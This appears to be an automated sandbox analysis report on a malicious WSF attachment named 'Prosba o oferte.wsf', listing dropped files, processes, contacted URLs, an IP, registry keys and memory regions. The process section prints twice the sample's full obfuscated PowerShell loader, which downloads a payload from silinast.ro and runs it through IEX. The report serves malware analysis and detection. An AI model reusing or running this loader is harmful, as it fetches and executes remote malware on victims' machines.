Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Prosba o oferte.wsf
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1b4a5mqq.wfo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jpe3iyr.xo4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eln5b1fe.wu4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pf5umom3.s5w.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Selvsikkerhedens.Pan
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Prosba o oferte.wsf"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c ping 6777.6777.6777.677e
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping 6777.6777.6777.677e
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser
Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic)
{$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic
-lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function
Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM
Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles
Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter
VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge
jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF
rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce
ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef:
andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf
nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf
Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80
(Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG
Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec
iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL
Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N
gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof
oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89
',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa
FortriGOffertoEEksponer housli]Distill:Vaadesk:DagbrknS rchiepEDampskic roniseuSidereaRPineryaIVrist utr publiyAppre,up D.emakRJaguaroOHestehatGenerelODoggylacBlou,ieOStrubehlU
unsti Recreme=Middelh Iglerne[CheviotnMesologeberapnitSu dogc.Syr,pliS eleddeeSelvsikc Unex,rudownpourGeswarpIWorktimtPulic
dyNonrecip,aandopR Limed,O ,bessiTCirkeleOP.oduktCPudsekaODromiciLForfristStencilY colossPButterpEUndercr]Salmary:Isa,xet:UnsuccuTKonditeLRishiseSDeplace1ma
tful2 ridine ');$oversaettelser=$remiserne[0];$Polymorphosis=(Ridsning89 'Bar alo$Steens.G EpilogL CheckmOschellaBMiljan AAn
sogel Dur ps:TelefonOAdvokatcOriginiCE,genesaAptianaSSamhrig= FelthrNSpleni eLinie,ewBehfter-JagtregoTantal b StrengJBara
keEslidstrCComma,pTSu.rhom estoves AntimeY SaloonsDefilertAnt,chaeDobbeltMAfgifts. An.misnAfmaalieSkovsneTPa.fyld.Matten
WQuotedrEdi tionBAdminisc acteriLMeltablIKarpetvePremonsN uperiotIon xal ');Ruttendes80 ($Polymorphosis);Ruttendes80 (Ridsning89
' Sjleg.$UrinemiO SalgspcPoternec teniniagrovelisRedunda.Polic.hHRandruseo ationaKova endBreathfeSomret r bygg,lsvidende[Sikkerh$udse
deeWarti en PhasmaeLngdespr Non ere yetstr]dolmere=Afsonin$SeriefrN TemanuoSj krinnmodta edSorbedsi ActionfCommutefho rorouNi
kroksIntestaiAleiptebSporvoglPaladineKarakte ');$Jobskabelsesordninger=Ridsning89 ' Thalam$UnameliOTekstmncBedrevncCrochetaLibatins
Bleph .FlertalDHelvedeoFiredrawTumulosnAlkars l ForeigofilicinaForstasd CrimelFcostoc,iMickla lPara heeAlmi de(Isogen $UnderekoAllerstv
RelubreStopklor KeelmasStone raSpidsbueGran patQua,rint Nat raelaceratlRegenersH nfreleSko emorProc am,Embed.m$P anineSDafniercSnuses
oPandekat,ipakvatAffjed i N vnef) Bu ble ';$Scotti=$Arenig;Ruttendes80 (Ridsning89 'Bedst v$ GrundvgPunkerwlv lutaro PharynbResolveAHighfalLPrecom.:GoaleeaMAdlayflECharrosSHelmi,tO
Ra.bitCStabensaTilbehrr RedimeD Gethesi O formUtchaderMSepiaer= Ast ol(AstrochtSjuskemeTommeskSFronts,tInertia-DruggerpSmaakraA
PentasTPseudochembedsf Pingpon$kuldsejsRegalebCKolportOTordenkTPopularTNebengei Vergeh),predtl ');while (!$Mesocardium) {Ruttendes80
(Ridsning89 'Cambric$GalantegU roduklIulid no MorakkbSkjaldeaBugginglTrochle:PirnedkC Corr.laPrelimilcontekev FilmfeaElektrodSheenieoSammenssUnsoci
eEmbedmer Arbejd=Tro aer$BlypeistStribedrdepreciu AntiloeBirdymu ') ;Ruttendes80 $Jobskabelsesordninger;Ruttendes80 (Ridsning89
' ProcessNrsy etTTran meA Mo regr almiakTNeu,osu-Pa apsysUorga iLVom srueIn.ylice TenorsPCracksk Ebionit4 Py tru ');Ruttendes80
(Ridsning89 ' anhan$ressourgHovedvelDemogoroFamilieBMohammeAS.yringlKonkurs:TarmacmMHyperpiEObloquiS SolsikoFugtig cTornensaReloaneRContribDPo
tanviDemograuQueniteMIndilat=rdskres(Tungekat.hanneleLunelseSEchino,tunm sse-StreungP,reddesA Sol tiTGatfinnHescapes Rsonnre$
netkorsTjanserCmisa.phOKasikumTUntuneatMiljoe iImp.ctf)Tiltruk ') ;Ruttendes80 (Ridsning89 'Faareky$ Span ggKom.eteL GrevinoUnder
tBM sterkAHexactdLBasunki:Svale,rrProat eSPseudomt synk.o=Vrngend$HypothegCelado LG ecingOGrovderb Fr.gtfAPandoorlArbej.s:S
ejlmohCurliewO EnolizvVankelmE Sa dviDRegulatsMeritleTreadornDAcetateE.rmorinRAppr xinLangtfreVoldgif+ Theopn+Bl,nder%B erska$Hjer,evrPopsieseBr
sekam Emi,teI aldernsTio ontEkagedejRC.tronsnIntertreAmbitio. remkalCTopiadeoNdlsninURevengenKraitsgtPhoma e ') ;$oversaettelser=$remiserne[$Rst];}$Tttedes=326639;$saltene=34997;Ruttendes80
(Ridsning89 ' Readab$ mediefGSkonn.rLOmvurdeOVejrforbSoudanoaIscenesLSmu dre:Addit rgPeripr aT yrocoLArchpriGHomoaniaBuggysblRhi
oth2Udvande1Doltish2Danaide Argesta= uanaju BoligakGMingledePecksbrTForthca- agstagCDirektoo HurtignInnobedTKrig skEBeneficnAdopt.vTAgrosto
Grssers$MorfinrsstatsobcFrem igoDronte T,anonesT SkydeliAfkogen ');Ruttendes80 (Ridsning89 'oejentr$Til.varg EnhalolLangesso
S oldibPedun uaDdse,stlPinlige:BlddeleSAdopt,vkPre ispr AnglicmMnemotekCr zadooI,putterGanespat Dollfie So emitH potrasDertilh
Pre.ect=Gudfryg Nyans t[PanorerS,ildoesy diculesS lstictStatio eHomeoidmNyttepl.Hov.dmnCStepninoOrganisnKrrers,vUrbicole GlandurDynamogtUmuligg]venc.es:
Apo.op:Stu.gerFBrode irNonk nfo,rosciemRescuerBAmati oa aveates Immunoe Grever6Appeten4UndergiSBldtes.t ungramrma tynii Omkar.nBydren
gIndsben(grazess$SygejouGDisacc aAfhngiglFolkebigBen alsaKartof lGardebr2Vilif e1Pseudob2Ratifik) Unretr ');Ruttendes80 (Ridsning89
'Sk ated$Musophag Fu ktiLF itageoUnshameb SyllabaPre bytLKlangen:preoccupVinduesR.oodleaOTantaluJRefereneK,stterk ArchemTsupermomMarlberAKaramboGBumbasseBusmanfrSideganE
Hypo iN.lhoppe Sharif=Olmintr Cateri [LaanernSS.ingomYA ticapsHolosyst Civil EW enersMNaphtha.Coked fTDis.quiE Temp,rxSymptomT
Demihe.Phello ECymosebn EmulsiCUdvikliOLethargDProvan ICo.loqunBi.liotG Frilag]Overmod: Ov.rho:TrstespANo icess B.ggemCRudime,iDiauli,i
Arbejd.ConnectgbibliogeSwitcheT CephalstrykknaTT levierS gganpI BebyrdnTrsterngSugem,k( Thia e$Stra leSScheelikGravsknR drulnmDobbeltkOenomanoTumu.usR
Som.dato dkritE PengestP.raconsordstrr)Garring ');Ruttendes80 (Ridsning89 'Kultu.e$SovjetrGFlys.yrlChauvinOO.ertrdbSludderA
HanderLRoadrun: For ulf CamelkURn eboenC.maenvN KakerleChemehuLudsvednFScru.uloOpsttecRFemma tML gerva= Bystat$ ndiscpS,ruktuRDataselOVibrahaJHyperdoE
GyritsK Bagkl tTrk uglMBan eorA ThemedgH spitaeG ksporRFremtidEMajonseNDomsafs.demetonS Ded.cnU Peake bKons rusun.erviTKaritt
R illedIBage,psNprecisigVirksom(Skaberi$AfstrafTUrb nisTAdanfejTConominEScar dldPalu amE Un bsts trafi , Michel$UdstansS
elotaAPrgt gel DolomitEjeresuE Eftergn HalvtieNonreti)Udbring ');Ruttendes80 $Funnelform;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser
Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic)
{$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic
-lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function
Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM
Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles
Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter
VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge
jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF
rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce
ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef:
andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf
nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf
Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80
(Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG
Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec
iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL
Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N
gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof
oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89
',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa
FortriGOffertoEEksponer housli]Distill:Vaadesk:DagbrknS rchiepEDampskic roniseuSidereaRPineryaIVrist utr publiyAppre,up D.emakRJaguaroOHestehatGenerelODoggylacBlou,ieOStrubehlU
unsti Recreme=Middelh Iglerne[CheviotnMesologeberapnitSu dogc.Syr,pliS eleddeeSelvsikc Unex,rudownpourGeswarpIWorktimtPulic
dyNonrecip,aandopR Limed,O ,bessiTCirkeleOP.oduktCPudsekaODromiciLForfristStencilY colossPButterpEUndercr]Salmary:Isa,xet:UnsuccuTKonditeLRishiseSDeplace1ma
tful2 ridine ');$oversaettelser=$remiserne[0];$Polymorphosis=(Ridsning89 'Bar alo$Steens.G EpilogL CheckmOschellaBMiljan AAn
sogel Dur ps:TelefonOAdvokatcOriginiCE,genesaAptianaSSamhrig= FelthrNSpleni eLinie,ewBehfter-JagtregoTantal b StrengJBara
keEslidstrCComma,pTSu.rhom estoves AntimeY SaloonsDefilertAnt,chaeDobbeltMAfgifts. An.misnAfmaalieSkovsneTPa.fyld.Matten
WQuotedrEdi tionBAdminisc acteriLMeltablIKarpetvePremonsN uperiotIon xal ');Ruttendes80 ($Polymorphosis);Ruttendes80 (Ridsning89
' Sjleg.$UrinemiO SalgspcPoternec teniniagrovelisRedunda.Polic.hHRandruseo ationaKova endBreathfeSomret r bygg,lsvidende[Sikkerh$udse
deeWarti en PhasmaeLngdespr Non ere yetstr]dolmere=Afsonin$SeriefrN TemanuoSj krinnmodta edSorbedsi ActionfCommutefho rorouNi
kroksIntestaiAleiptebSporvoglPaladineKarakte ');$Jobskabelsesordninger=Ridsning89 ' Thalam$UnameliOTekstmncBedrevncCrochetaLibatins
Bleph .FlertalDHelvedeoFiredrawTumulosnAlkars l ForeigofilicinaForstasd CrimelFcostoc,iMickla lPara heeAlmi de(Isogen $UnderekoAllerstv
RelubreStopklor KeelmasStone raSpidsbueGran patQua,rint Nat raelaceratlRegenersH nfreleSko emorProc am,Embed.m$P anineSDafniercSnuses
oPandekat,ipakvatAffjed i N vnef) Bu ble ';$Scotti=$Arenig;Ruttendes80 (Ridsning89 'Bedst v$ GrundvgPunkerwlv lutaro PharynbResolveAHighfalLPrecom.:GoaleeaMAdlayflECharrosSHelmi,tO
Ra.bitCStabensaTilbehrr RedimeD Gethesi O formUtchaderMSepiaer= Ast ol(AstrochtSjuskemeTommeskSFronts,tInertia-DruggerpSmaakraA
PentasTPseudochembedsf Pingpon$kuldsejsRegalebCKolportOTordenkTPopularTNebengei Vergeh),predtl ');while (!$Mesocardium) {Ruttendes80
(Ridsning89 'Cambric$GalantegU roduklIulid no MorakkbSkjaldeaBugginglTrochle:PirnedkC Corr.laPrelimilcontekev FilmfeaElektrodSheenieoSammenssUnsoci
eEmbedmer Arbejd=Tro aer$BlypeistStribedrdepreciu AntiloeBirdymu ') ;Ruttendes80 $Jobskabelsesordninger;Ruttendes80 (Ridsning89
' ProcessNrsy etTTran meA Mo regr almiakTNeu,osu-Pa apsysUorga iLVom srueIn.ylice TenorsPCracksk Ebionit4 Py tru ');Ruttendes80
(Ridsning89 ' anhan$ressourgHovedvelDemogoroFamilieBMohammeAS.yringlKonkurs:TarmacmMHyperpiEObloquiS SolsikoFugtig cTornensaReloaneRContribDPo
tanviDemograuQueniteMIndilat=rdskres(Tungekat.hanneleLunelseSEchino,tunm sse-StreungP,reddesA Sol tiTGatfinnHescapes Rsonnre$
netkorsTjanserCmisa.phOKasikumTUntuneatMiljoe iImp.ctf)Tiltruk ') ;Ruttendes80 (Ridsning89 'Faareky$ Span ggKom.eteL GrevinoUnder
tBM sterkAHexactdLBasunki:Svale,rrProat eSPseudomt synk.o=Vrngend$HypothegCelado LG ecingOGrovderb Fr.gtfAPandoorlArbej.s:S
ejlmohCurliewO EnolizvVankelmE Sa dviDRegulatsMeritleTreadornDAcetateE.rmorinRAppr xinLangtfreVoldgif+ Theopn+Bl,nder%B erska$Hjer,evrPopsieseBr
sekam Emi,teI aldernsTio ontEkagedejRC.tronsnIntertreAmbitio. remkalCTopiadeoNdlsninURevengenKraitsgtPhoma e ') ;$oversaettelser=$remiserne[$Rst];}$Tttedes=326639;$saltene=34997;Ruttendes80
(Ridsning89 ' Readab$ mediefGSkonn.rLOmvurdeOVejrforbSoudanoaIscenesLSmu dre:Addit rgPeripr aT yrocoLArchpriGHomoaniaBuggysblRhi
oth2Udvande1Doltish2Danaide Argesta= uanaju BoligakGMingledePecksbrTForthca- agstagCDirektoo HurtignInnobedTKrig skEBeneficnAdopt.vTAgrosto
Grssers$MorfinrsstatsobcFrem igoDronte T,anonesT SkydeliAfkogen ');Ruttendes80 (Ridsning89 'oejentr$Til.varg EnhalolLangesso
S oldibPedun uaDdse,stlPinlige:BlddeleSAdopt,vkPre ispr AnglicmMnemotekCr zadooI,putterGanespat Dollfie So emitH potrasDertilh
Pre.ect=Gudfryg Nyans t[PanorerS,ildoesy diculesS lstictStatio eHomeoidmNyttepl.Hov.dmnCStepninoOrganisnKrrers,vUrbicole GlandurDynamogtUmuligg]venc.es:
Apo.op:Stu.gerFBrode irNonk nfo,rosciemRescuerBAmati oa aveates Immunoe Grever6Appeten4UndergiSBldtes.t ungramrma tynii Omkar.nBydren
gIndsben(grazess$SygejouGDisacc aAfhngiglFolkebigBen alsaKartof lGardebr2Vilif e1Pseudob2Ratifik) Unretr ');Ruttendes80 (Ridsning89
'Sk ated$Musophag Fu ktiLF itageoUnshameb SyllabaPre bytLKlangen:preoccupVinduesR.oodleaOTantaluJRefereneK,stterk ArchemTsupermomMarlberAKaramboGBumbasseBusmanfrSideganE
Hypo iN.lhoppe Sharif=Olmintr Cateri [LaanernSS.ingomYA ticapsHolosyst Civil EW enersMNaphtha.Coked fTDis.quiE Temp,rxSymptomT
Demihe.Phello ECymosebn EmulsiCUdvikliOLethargDProvan ICo.loqunBi.liotG Frilag]Overmod: Ov.rho:TrstespANo icess B.ggemCRudime,iDiauli,i
Arbejd.ConnectgbibliogeSwitcheT CephalstrykknaTT levierS gganpI BebyrdnTrsterngSugem,k( Thia e$Stra leSScheelikGravsknR drulnmDobbeltkOenomanoTumu.usR
Som.dato dkritE PengestP.raconsordstrr)Garring ');Ruttendes80 (Ridsning89 'Kultu.e$SovjetrGFlys.yrlChauvinOO.ertrdbSludderA
HanderLRoadrun: For ulf CamelkURn eboenC.maenvN KakerleChemehuLudsvednFScru.uloOpsttecRFemma tML gerva= Bystat$ ndiscpS,ruktuRDataselOVibrahaJHyperdoE
GyritsK Bagkl tTrk uglMBan eorA ThemedgH spitaeG ksporRFremtidEMajonseNDomsafs.demetonS Ded.cnU Peake bKons rusun.erviTKaritt
R illedIBage,psNprecisigVirksom(Skaberi$AfstrafTUrb nisTAdanfejTConominEScar dldPalu amE Un bsts trafi , Michel$UdstansS
elotaAPrgt gel DolomitEjeresuE Eftergn HalvtieNonreti)Udbring ');Ruttendes80 $Funnelform;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://silinast.ro
|
unknown
|
|
|
|
http://silinast.ro/Kommunikuternes.infP
|
unknown
|
|
|
|
http://silinast.ro/Kommunikuternes.infXR$lX
|
unknown
|
|
|
|
http://silinast.roXh
|
unknown
|
|
|
|
http://silinast.roXR
|
unknown
|
|
|
|
http://silinast.ro/Kommunikuternes.inf
|
188.241.183.45
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
6777.6777.6777.677e
|
unknown
|
|
|
|
silinast.ro
|
188.241.183.45
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.241.183.45
|
silinast.ro
|
Romania
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8370000
|
direct allocation
|
page execute and read and write
|
|
|
|
95B5000
|
direct allocation
|
page execute and read and write
|
|
|
|
55C6000
|
trusted library allocation
|
page read and write
|
|
|
|
2CC94CF3000
|
trusted library allocation
|
page read and write
|
|
|
|
72B0000
|
trusted library allocation
|
page read and write
|
||
|
2CC83224000
|
heap
|
page read and write
|
||
|
8A90000
|
direct allocation
|
page execute and read and write
|
||
|
20511811000
|
heap
|
page read and write
|
||
|
44D0000
|
heap
|
page execute and read and write
|
||
|
2CC86A04000
|
trusted library allocation
|
page read and write
|
||
|
7DC0000
|
trusted library allocation
|
page read and write
|
||
|
2050FB56000
|
heap
|
page read and write
|
||
|
F29C2FC000
|
stack
|
page read and write
|
||
|
2050FB1F000
|
heap
|
page read and write
|
||
|
7F65000
|
trusted library allocation
|
page read and write
|
||
|
2CC9CC8D000
|
heap
|
page read and write
|
||
|
7FFD9B7C5000
|
trusted library allocation
|
page read and write
|
||
|
2050FB7E000
|
heap
|
page read and write
|
||
|
ED5D1BE000
|
stack
|
page read and write
|
||
|
ED5CA7E000
|
stack
|
page read and write
|
||
|
4E20000
|
trusted library allocation
|
page read and write
|
||
|
2CC9D430000
|
heap
|
page read and write
|
||
|
733B000
|
stack
|
page read and write
|
||
|
2050FB43000
|
heap
|
page read and write
|
||
|
25F0000
|
heap
|
page read and write
|
||
|
2CC83140000
|
heap
|
page read and write
|
||
|
2A15000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F0000
|
heap
|
page read and write
|
||
|
2CC83360000
|
heap
|
page execute and read and write
|
||
|
2CC9D0F0000
|
heap
|
page read and write
|
||
|
2AE8000
|
heap
|
page read and write
|
||
|
2CC9D3FF000
|
heap
|
page read and write
|
||
|
2050FB6F000
|
heap
|
page read and write
|
||
|
27FE7FE000
|
stack
|
page read and write
|
||
|
2A10000
|
trusted library allocation
|
page read and write
|
||
|
2CC831F0000
|
heap
|
page read and write
|
||
|
2CC83395000
|
heap
|
page read and write
|
||
|
2050FB60000
|
heap
|
page read and write
|
||
|
80AE000
|
heap
|
page read and write
|
||
|
2051182D000
|
heap
|
page read and write
|
||
|
80F3000
|
heap
|
page read and write
|
||
|
2CC86B70000
|
trusted library allocation
|
page read and write
|
||
|
7E00000
|
trusted library allocation
|
page read and write
|
||
|
2CC94C81000
|
trusted library allocation
|
page read and write
|
||
|
24DE9070000
|
heap
|
page read and write
|
||
|
7290000
|
trusted library allocation
|
page read and write
|
||
|
4360000
|
heap
|
page readonly
|
||
|
2980000
|
heap
|
page read and write
|
||
|
ED5D23B000
|
stack
|
page read and write
|
||
|
2CC94C90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B5E0000
|
trusted library allocation
|
page read and write
|
||
|
2050FB91000
|
heap
|
page read and write
|
||
|
810B000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
2CC831A7000
|
heap
|
page read and write
|
||
|
2050FB91000
|
heap
|
page read and write
|
||
|
7FFD9B696000
|
trusted library allocation
|
page read and write
|
||
|
7250000
|
trusted library allocation
|
page read and write
|
||
|
7E20000
|
trusted library allocation
|
page read and write
|
||
|
45B4000
|
trusted library allocation
|
page read and write
|
||
|
